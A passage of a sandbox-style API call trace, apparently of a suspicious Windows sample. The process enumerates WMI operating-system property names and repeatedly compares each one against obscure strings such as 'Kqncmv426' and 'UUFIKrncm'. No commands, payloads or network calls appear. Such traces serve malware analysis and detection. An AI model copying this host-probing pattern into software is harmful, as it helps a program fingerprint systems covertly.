[0044.385] IWbemClassObject:Get (in: This=0x223dba8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.385] IWbemClassObject:Get (in: This=0x223dba8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Organization", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OSLanguage", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.386] lstrlenW (lpString="OSLanguage") returned 10
[0044.386] lstrlenW (lpString="Kqncmv426") returned 9
[0044.386] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="OSLanguage", cchCount2=10) returned 1
[0044.386] lstrlenW (lpString="OSLanguage") returned 10
[0044.386] lstrlenW (lpString="lgiet286a") returned 9
[0044.386] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="OSLanguage", cchCount2=10) returned 1
[0044.386] lstrlenW (lpString="OSLanguage") returned 10
[0044.386] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.386] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="OSLanguage", cchCount2=10) returned 3
[0044.386] lstrlenW (lpString="OSLanguage") returned 10
[0044.386] lstrlenW (lpString="numberofusers") returned 13
[0044.386] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="OSLanguage", cchCount2=10) returned 1
[0044.386] IUnknown:Release (This=0x223dba8) returned 0x1
[0044.386] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.386] IWbemClassObject:Get (in: This=0x2241900, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.386] IWbemClassObject:Get (in: This=0x2241900, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OSLanguage", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OSProductSuite", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.386] lstrlenW (lpString="OSProductSuite") returned 14
[0044.386] lstrlenW (lpString="Kqncmv426") returned 9
[0044.386] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="OSProductSuite", cchCount2=14) returned 1
[0044.387] lstrlenW (lpString="OSProductSuite") returned 14
[0044.387] lstrlenW (lpString="lgiet286a") returned 9
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="OSProductSuite", cchCount2=14) returned 1
[0044.387] lstrlenW (lpString="OSProductSuite") returned 14
[0044.387] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="OSProductSuite", cchCount2=14) returned 3
[0044.387] lstrlenW (lpString="OSProductSuite") returned 14
[0044.387] lstrlenW (lpString="numberofusers") returned 13
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="OSProductSuite", cchCount2=14) returned 1
[0044.387] IUnknown:Release (This=0x2241900) returned 0x1
[0044.387] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.387] IWbemClassObject:Get (in: This=0x2241a98, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.387] IWbemClassObject:Get (in: This=0x2241a98, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OSProductSuite", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OSType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.387] lstrlenW (lpString="OSType") returned 6
[0044.387] lstrlenW (lpString="Kqncmv426") returned 9
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="OSType", cchCount2=6) returned 1
[0044.387] lstrlenW (lpString="OSType") returned 6
[0044.387] lstrlenW (lpString="lgiet286a") returned 9
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="OSType", cchCount2=6) returned 1
[0044.387] lstrlenW (lpString="OSType") returned 6
[0044.387] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="OSType", cchCount2=6) returned 3
[0044.387] lstrlenW (lpString="OSType") returned 6
[0044.387] lstrlenW (lpString="numberofusers") returned 13
[0044.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="OSType", cchCount2=6) returned 1
[0044.387] IUnknown:Release (This=0x2241a98) returned 0x1
[0044.387] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.388] IWbemClassObject:Get (in: This=0x2241c30, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.388] IWbemClassObject:Get (in: This=0x2241c30, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OSType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OtherTypeDescription", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.388] lstrlenW (lpString="OtherTypeDescription") returned 20
[0044.388] lstrlenW (lpString="Kqncmv426") returned 9
[0044.388] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="OtherTypeDescription", cchCount2=20) returned 1
[0044.388] lstrlenW (lpString="OtherTypeDescription") returned 20
[0044.388] lstrlenW (lpString="lgiet286a") returned 9
[0044.388] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="OtherTypeDescription", cchCount2=20) returned 1
[0044.388] lstrlenW (lpString="OtherTypeDescription") returned 20
[0044.388] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.388] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="OtherTypeDescription", cchCount2=20) returned 3
[0044.388] lstrlenW (lpString="OtherTypeDescription") returned 20
[0044.388] lstrlenW (lpString="numberofusers") returned 13
[0044.388] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="OtherTypeDescription", cchCount2=20) returned 1
[0044.388] IUnknown:Release (This=0x2241c30) returned 0x1
[0044.388] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.388] IWbemClassObject:Get (in: This=0x2241dc8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.389] IWbemClassObject:Get (in: This=0x2241dc8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="OtherTypeDescription", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="PlusProductID", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.389] lstrlenW (lpString="PlusProductID") returned 13
[0044.389] lstrlenW (lpString="Kqncmv426") returned 9
[0044.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="PlusProductID", cchCount2=13) returned 1
[0044.389] lstrlenW (lpString="PlusProductID") returned 13
[0044.389] lstrlenW (lpString="lgiet286a") returned 9
[0044.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="PlusProductID", cchCount2=13) returned 1
[0044.389] lstrlenW (lpString="PlusProductID") returned 13
[0044.389] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="PlusProductID", cchCount2=13) returned 3
[0044.389] lstrlenW (lpString="PlusProductID") returned 13
[0044.389] lstrlenW (lpString="numberofusers") returned 13
[0044.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="PlusProductID", cchCount2=13) returned 1
[0044.389] IUnknown:Release (This=0x2241dc8) returned 0x1
[0044.389] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.389] IWbemClassObject:Get (in: This=0x2241f60, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.389] IWbemClassObject:Get (in: This=0x2241f60, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="PlusProductID", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="PlusVersionNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.389] lstrlenW (lpString="PlusVersionNumber") returned 17
[0044.389] lstrlenW (lpString="Kqncmv426") returned 9
[0044.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="PlusVersionNumber", cchCount2=17) returned 1
[0044.389] lstrlenW (lpString="PlusVersionNumber") returned 17
[0044.389] lstrlenW (lpString="lgiet286a") returned 9
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="PlusVersionNumber", cchCount2=17) returned 1
[0044.390] lstrlenW (lpString="PlusVersionNumber") returned 17
[0044.390] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="PlusVersionNumber", cchCount2=17) returned 3
[0044.390] lstrlenW (lpString="PlusVersionNumber") returned 17
[0044.390] lstrlenW (lpString="numberofusers") returned 13
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="PlusVersionNumber", cchCount2=17) returned 1
[0044.390] IUnknown:Release (This=0x2241f60) returned 0x1
[0044.390] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.390] IWbemClassObject:Get (in: This=0x22420f8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.390] IWbemClassObject:Get (in: This=0x22420f8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="PlusVersionNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Primary", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.390] lstrlenW (lpString="Primary") returned 7
[0044.390] lstrlenW (lpString="Kqncmv426") returned 9
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Primary", cchCount2=7) returned 1
[0044.390] lstrlenW (lpString="Primary") returned 7
[0044.390] lstrlenW (lpString="lgiet286a") returned 9
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Primary", cchCount2=7) returned 1
[0044.390] lstrlenW (lpString="Primary") returned 7
[0044.390] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Primary", cchCount2=7) returned 3
[0044.390] lstrlenW (lpString="Primary") returned 7
[0044.390] lstrlenW (lpString="numberofusers") returned 13
[0044.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Primary", cchCount2=7) returned 1
[0044.390] IUnknown:Release (This=0x22420f8) returned 0x1
[0044.390] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.391] IWbemClassObject:Get (in: This=0x2242290, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.391] IWbemClassObject:Get (in: This=0x2242290, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Primary", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="QuantumLength", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.391] lstrlenW (lpString="QuantumLength") returned 13
[0044.391] lstrlenW (lpString="Kqncmv426") returned 9
[0044.391] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="QuantumLength", cchCount2=13) returned 1
[0044.391] lstrlenW (lpString="QuantumLength") returned 13
[0044.391] lstrlenW (lpString="lgiet286a") returned 9
[0044.391] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="QuantumLength", cchCount2=13) returned 1
[0044.391] lstrlenW (lpString="QuantumLength") returned 13
[0044.391] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.391] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="QuantumLength", cchCount2=13) returned 3
[0044.391] lstrlenW (lpString="QuantumLength") returned 13
[0044.391] lstrlenW (lpString="numberofusers") returned 13
[0044.391] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="QuantumLength", cchCount2=13) returned 1
[0044.391] IUnknown:Release (This=0x2242290) returned 0x1
[0044.391] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.391] IWbemClassObject:Get (in: This=0x2242428, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.392] IWbemClassObject:Get (in: This=0x2242428, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="QuantumLength", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="QuantumType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.392] lstrlenW (lpString="QuantumType") returned 11
[0044.392] lstrlenW (lpString="Kqncmv426") returned 9
[0044.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="QuantumType", cchCount2=11) returned 1
[0044.392] lstrlenW (lpString="QuantumType") returned 11
[0044.392] lstrlenW (lpString="lgiet286a") returned 9
[0044.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="QuantumType", cchCount2=11) returned 1
[0044.392] lstrlenW (lpString="QuantumType") returned 11
[0044.392] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="QuantumType", cchCount2=11) returned 3
[0044.392] lstrlenW (lpString="QuantumType") returned 11
[0044.392] lstrlenW (lpString="numberofusers") returned 13
[0044.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="QuantumType", cchCount2=11) returned 1
[0044.392] IUnknown:Release (This=0x2242428) returned 0x1
[0044.392] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.392] IWbemClassObject:Get (in: This=0x22425c0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.392] IWbemClassObject:Get (in: This=0x22425c0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="QuantumType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="RegisteredUser", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.392] lstrlenW (lpString="RegisteredUser") returned 14
[0044.392] lstrlenW (lpString="Kqncmv426") returned 9
[0044.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="RegisteredUser", cchCount2=14) returned 1
[0044.392] lstrlenW (lpString="RegisteredUser") returned 14
[0044.392] lstrlenW (lpString="lgiet286a") returned 9
[0044.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="RegisteredUser", cchCount2=14) returned 1
[0044.392] lstrlenW (lpString="RegisteredUser") returned 14
[0044.392] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="RegisteredUser", cchCount2=14) returned 3
[0044.393] lstrlenW (lpString="RegisteredUser") returned 14
[0044.393] lstrlenW (lpString="numberofusers") returned 13
[0044.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="RegisteredUser", cchCount2=14) returned 1
[0044.393] IUnknown:Release (This=0x22425c0) returned 0x1
[0044.393] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.393] IWbemClassObject:Get (in: This=0x2242758, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.393] IWbemClassObject:Get (in: This=0x2242758, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="RegisteredUser", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SerialNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="SerialNumber", cchCount2=12) returned 1
[0044.393] lstrlenW (lpString="SerialNumber") returned 12
[0044.393] lstrlenW (lpString="lgiet286a") returned 9
[0044.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="SerialNumber", cchCount2=12) returned 1
[0044.393] lstrlenW (lpString="SerialNumber") returned 12
[0044.393] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="SerialNumber", cchCount2=12) returned 3
[0044.393] lstrlenW (lpString="SerialNumber") returned 12
[0044.393] lstrlenW (lpString="numberofusers") returned 13
[0044.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="SerialNumber", cchCount2=12) returned 1
[0044.393] IUnknown:Release (This=0x2242758) returned 0x1
[0044.393] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.393] IWbemClassObject:Get (in: This=0x22428f0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.393] IWbemClassObject:Get (in: This=0x22428f0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="SerialNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="ServicePackMajorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="ServicePackMajorVersion", cchCount2=23) returned 1
[0044.394] lstrlenW (lpString="ServicePackMajorVersion") returned 23
[0044.394] lstrlenW (lpString="lgiet286a") returned 9
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="ServicePackMajorVersion", cchCount2=23) returned 1
[0044.394] lstrlenW (lpString="ServicePackMajorVersion") returned 23
[0044.394] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="ServicePackMajorVersion", cchCount2=23) returned 3
[0044.394] lstrlenW (lpString="ServicePackMajorVersion") returned 23
[0044.394] lstrlenW (lpString="numberofusers") returned 13
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="ServicePackMajorVersion", cchCount2=23) returned 1
[0044.394] IUnknown:Release (This=0x22428f0) returned 0x1
[0044.394] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.394] IWbemClassObject:Get (in: This=0x2242a88, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.394] IWbemClassObject:Get (in: This=0x2242a88, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="ServicePackMajorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="ServicePackMinorVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="ServicePackMinorVersion", cchCount2=23) returned 1
[0044.394] lstrlenW (lpString="ServicePackMinorVersion") returned 23
[0044.394] lstrlenW (lpString="lgiet286a") returned 9
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="ServicePackMinorVersion", cchCount2=23) returned 1
[0044.394] lstrlenW (lpString="ServicePackMinorVersion") returned 23
[0044.394] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="ServicePackMinorVersion", cchCount2=23) returned 3
[0044.394] lstrlenW (lpString="ServicePackMinorVersion") returned 23
[0044.394] lstrlenW (lpString="numberofusers") returned 13
[0044.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="ServicePackMinorVersion", cchCount2=23) returned 1
[0044.394] IUnknown:Release (This=0x2242a88) returned 0x1
[0044.394] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.394] IWbemClassObject:Get (in: This=0x2242c20, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
